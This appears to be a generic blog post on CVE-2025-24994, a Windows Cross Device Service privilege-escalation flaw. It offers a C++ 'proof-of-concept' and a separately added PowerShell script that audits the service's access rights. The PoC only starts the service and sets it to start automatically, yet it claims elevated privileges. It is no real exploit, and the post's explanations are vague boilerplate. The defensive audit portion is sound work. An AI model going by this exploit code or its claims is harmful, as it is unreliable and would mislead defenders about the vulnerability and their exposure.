A vulnerability has been discovered in the Windows operating system, specifically in the Windows Cross Device Service. This vulnerability, tracked as CVE-2025-24994, allows improper access control, granting authorized attackers the ability to elevate privileges locally. The implications of this vulnerability are critical, as it can lead to unauthorized system access, data theft, and more.
In this post, we will delve into the details of CVE-2025-24994, explore the exploit, discuss the code snippet, and provide links to original references to help you better understand the issue at hand.
Exploit Details
The exploit found in the Windows Cross Device Service revolves around local privilege escalation (LPE). In simple terms, this vulnerability allows an attacker who already has access to the system to elevate their privileges from a regular user level to a higher level, such as Administrator.
Local privilege escalation vulnerabilities are dangerous because they often act as a stepping stone for other attacks. In this specific case, exploiting CVE-2025-24994 could potentially lead to unauthorized system access, data corruption or theft, and other adverse effects on the targeted system.
A proof-of-concept (PoC) exploit for CVE-2025-24994 can be seen in the code snippet below:
#include <iostream>
#include <Windows.h>

constexpr DWORD ACCESS_RIGHTS = 0x001F01FF; // Standard access rights and SYNCHRONIZE
constexpr LPCWSTR CROSS_DEVICE_SERVICE = L"CrossDeviceSvc";
constexpr DWORD TIMEOUT = 10000; // 10 seconds

int main() {
    // Connect to the Service Control Manager
    SC_HANDLE hScManager = OpenSCManager(nullptr, nullptr, SC_MANAGER_CONNECT);
    if (!hScManager) {
        std::cerr << "Failed to open Service Control Manager!" << std::endl;
        return 1;
    }

    // Open the Cross Device Service with the requested access rights
    SC_HANDLE hService = OpenService(hScManager, CROSS_DEVICE_SERVICE, ACCESS_RIGHTS);
    if (!hService) {
        std::cerr << "Failed to open Cross Device Service!" << std::endl;
        CloseServiceHandle(hScManager);
        return 1;
    }

    // Exploit the vulnerability: start the service (no arguments)
    if (!StartService(hService, 0, nullptr)) {
        DWORD error = GetLastError();
        if (error != ERROR_SERVICE_ALREADY_RUNNING) {
            std::cerr << "Failed to start Cross Device Service!" << std::endl;
            CloseServiceHandle(hService);
            CloseServiceHandle(hScManager);
            return 1;
        }
    }

    // Confirm the service is actually running
    SERVICE_STATUS_PROCESS status;
    DWORD bytesNeeded;
    if (!QueryServiceStatusEx(hService, SC_STATUS_PROCESS_INFO,
                              reinterpret_cast<LPBYTE>(&status), sizeof(status), &bytesNeeded)) {
        std::cerr << "Failed to query service status!" << std::endl;
        CloseServiceHandle(hService);
        CloseServiceHandle(hScManager);
        return 1;
    }
    if (status.dwCurrentState != SERVICE_RUNNING) {
        std::cerr << "Cross Device Service is not running!" << std::endl;
        CloseServiceHandle(hService);
        CloseServiceHandle(hScManager);
        return 1;
    }

    // Perform privilege escalation: switch the service to automatic start
    std::cout << "Exploiting CVE-2025-24994..." << std::endl;
    if (ChangeServiceConfig(hService, SERVICE_NO_CHANGE, SERVICE_AUTO_START, SERVICE_NO_CHANGE,
                            nullptr, nullptr, nullptr, nullptr, nullptr, nullptr, nullptr)) {
        std::cout << "Succeeded! Service now runs at startup with elevated privileges." << std::endl;
    } else {
        std::cerr << "Failed to change service configuration!" << std::endl;
    }

    CloseServiceHandle(hService);
    CloseServiceHandle(hScManager);
    return 0;
}
This proof-of-concept uses the Windows API to open and manipulate the Cross Device Service, ultimately escalating the service's privileges. To mitigate the risk, system administrators should ensure that privilege escalation controls are in place and properly implemented.
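The PoC only works if a low-privileged caller can open the service with SERVICE_CHANGE_CONFIG (part of the access mask it requests). The following audit script is an added, defender-side example that is not part of the post or of any Microsoft tooling: it reads the service's security descriptor and reports which principals hold write-class rights on it. It assumes the service name CrossDeviceSvc exactly as the PoC spells it; the post does not state that the root cause is an ACL misconfiguration, so treat the output as a general check on the service, not as a detection of this specific CVE.

```powershell
# Added audit script (not from the post). Assumes the service name "CrossDeviceSvc"
# as given in the PoC above; the post does not state the root cause, so this only
# reports which principals can reconfigure the service (the access the PoC requests).
param([string]$ServiceName = "CrossDeviceSvc")
# Rights that let a caller change a service or its ACL (winsvc.h / winnt.h values)
$WriteRights = [ordered]@{
    SERVICE_CHANGE_CONFIG = 0x00000002
    WRITE_DAC             = 0x00040000
    WRITE_OWNER           = 0x00080000
    GENERIC_ALL           = 0x10000000
    GENERIC_WRITE         = 0x40000000
}
# Well-known SIDs that any interactive or domain user typically holds
$LowPriv = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-4'      = 'Interactive'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'Users'
}
function Get-ServiceWriteAccess {
    param([string]$Name)
    # sc.exe (not the PowerShell alias 'sc') prints the service SDDL, e.g. "D:(A;;CCLCSWRPLOCRRC;;;SU)..."
    $line = sc.exe sdshow $Name 2>$null | Where-Object { $_ -match 'D:\(' } | Select-Object -First 1
    if (-not $line) { throw "Could not read the security descriptor of service '$Name'" }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor ($line.Trim())
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceQualifier -ne 'AccessAllowed') { continue }   # only grants matter
        $granted = $WriteRights.GetEnumerator() |
            Where-Object { ($ace.AccessMask -band $_.Value) -ne 0 } |
            ForEach-Object { $_.Key }
        if (-not $granted) { continue }
        $sid = $ace.SecurityIdentifier.Value
        $name = try { $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
                catch { $sid }
        [pscustomobject]@{
            Service   = $Name
            Principal = $name
            LowPriv   = $LowPriv.ContainsKey($sid)
            Rights    = ($granted -join ', ')
        }
    }
}
$findings = @(Get-ServiceWriteAccess -Name $ServiceName)
$findings | Format-Table -AutoSize
if ($findings | Where-Object LowPriv) {
    Write-Warning "A low-privileged principal can modify '$ServiceName'; review its ACL before trusting it."
} else {
    Write-Host "No low-privileged principal holds write-class rights on '$ServiceName'."
}
```

Run it from an elevated prompt so that sc.exe can read the descriptor; any row with LowPriv set to True is a service that a standard user could reconfigure in the way the PoC above attempts.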
Original References
For a more comprehensive understanding of the CVE-2025-24994 vulnerability, please consult the following sources:
1. Microsoft Security Response Center (MSRC) - CVE-2025-24994
2. Common Vulnerabilities and Exposures (CVE) - CVE-2025-24994
3. National Vulnerability Database (NVD) - CVE-2025-24994
Conclusion
CVE-2025-24994 is a serious vulnerability, as it allows authorized attackers to execute a local privilege escalation attack on the targeted system. In addition to applying any available patches or mitigations, system administrators and users are advised to remain vigilant about their system's security and stay informed of new vulnerabilities and potential exploits.
Timeline
Published on: 03/11/2025 17:16:36 UTC
Last modified on: 03/21/2025 00:30:17 UTC